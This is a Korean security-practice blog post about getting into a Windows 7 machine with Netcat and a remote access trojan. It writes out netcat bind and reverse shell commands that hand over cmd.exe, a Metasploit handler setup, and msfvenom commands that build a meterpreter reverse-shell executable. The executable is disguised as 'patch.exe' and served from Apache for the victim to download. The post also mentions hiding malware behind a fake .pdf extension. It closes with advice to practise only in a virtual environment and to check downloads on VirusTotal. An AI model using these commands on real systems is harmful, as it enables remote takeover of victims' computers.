[정보보안][칼리리눅스] nc(Netcat)와 RAT(트로이목마)을 통한 Windows7 침투

1 . Netcat이란? RAT이란?

 

NetCat에 대한 정보는 https://walk-cat-dev.tistory.com/116 

 

[정보보안][칼리리눅스] EternalBlue 취약점을 이용한 Windows7 Exploit

 

이곳에 간략히 적어놨다.

 

그렇다면 RAT(Remote Access Trojan)이란 무엇일까?

 

쉽게 말해서 트로이목마 악성코드다.

 

아주 작은 트로이목마 실행파일이며

 

몰래 잠입해서 실행되면 외부의 서버와 연결을 할 수 있다. ( Reverse Connection )

---

2.  Netcat을 통한 연결

 

먼저 정상 연결에 대해 알아보자 

 

1. Victim 설정 ( Windows7 : Server )

 

cd [nc.Path]
nc -l -p 8000 -e cmd.exe // -l : listening, -p : port, -e : 실행권한 (8000번 포트를 열고 서버가 대기)

 

2. Attacker 설정 ( Kali Linux : Client )

 

nc [Windows IP] 8000

 

이번엔 Reverse Connection으로 연결하는 법에 대해 알아보자

 

1. Victim 설정 ( Windows7 : Client )

 

nc [Kali Linux IP] 9000 -e cmd.exe

 

2. Attacker 설정 ( Kali Linux : Server )

 

nc -l -p 9000

 

Reverse Connection의 경우는 Victim이 직접 클릭하거나 웹 쉘을 통해 입력해야 한다. ( 악성코드 감염 )

---

3. RAT 악성코드 생성하기

 

1. 멀티 핸들러 설정

 

# msfconsole
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set lhost [my IP]
msf6 > exploit
----> 4444포트 열고 대기 상태

 

2. RAT 만들기

 

$ sudo -i
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[my IP] LPORT=4444 -f exe > shell.exe
# cp shell.exe /var/www/html/patch.exe
# cd /var/www/html
# chmod 777 patch.exe
# service apache2 start

 

이렇게 칼리리눅스에서 RAT파일을 만들고 apache2서버를 통해 포트를 열 수 있다.

 

이제 WIndows7 웹 브라우저 주소창에서 Kali IP를 입력하고 파일명을 입력하면?

 

파일이 다운 받아지고 클릭하면 칼리 리눅스와 연결된다.

 

요즘은 특히 여러 악성코드와 랜섬웨어들이 많아졌다.

 

입사지원서.pdf                                                 .exe 와 같은 형식의 파일은 눈치 채기도 힘들다.

 

그러니 메일이나 인터넷 파일 다운로드는 항상 조심하도록 해야한다.

 

www.virustotal.com

VirusTotal

 

이곳에서는 전세계 보안 업체들의 빅데이터를 바탕으로 악성코드의 여부를 확인해준다.

 

실습은 항상 가상환경에서만 하도록 한다.

 

징역과 벌금이 매우 무겁다.